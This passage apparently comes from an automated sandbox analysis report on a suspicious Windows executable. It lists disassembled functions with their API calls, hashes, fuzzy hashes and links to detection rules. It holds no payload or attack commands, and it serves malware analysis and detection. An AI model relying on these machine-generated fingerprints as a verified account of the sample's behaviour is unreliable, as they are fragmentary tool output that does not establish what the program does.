                                                            • String ID:
                                                            • API String ID: 2445788494-0
                                                            • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                            • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                            Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID: failed to allocate %u bytes of memory
                                                            • API String ID: 2803490479-1168259600
                                                            • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                            • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                            • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                            • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0041BDDF
                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemset
                                                            • String ID:
                                                            • API String ID: 1065087418-0
                                                            • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                            • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                            Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$??2@
                                                            • String ID:
                                                            • API String ID: 3700833809-0
                                                            • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                            • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                            • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                            • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                            • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                            • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                            • String ID:
                                                            • API String ID: 1381354015-0
                                                            • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                            • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                            Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004301AD
                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID:
                                                            • API String ID: 1297977491-0
                                                            • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                            • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                            • String ID:
                                                            • API String ID: 2154303073-0
                                                            • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                            • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3150196962-0
                                                            • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                            • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$PointerRead
                                                            • String ID:
                                                            • API String ID: 3154509469-0
                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                            • String ID:
                                                            • API String ID: 4232544981-0
                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FileModuleName
                                                            • String ID:
                                                            • API String ID: 3859505661-0
                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                            • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
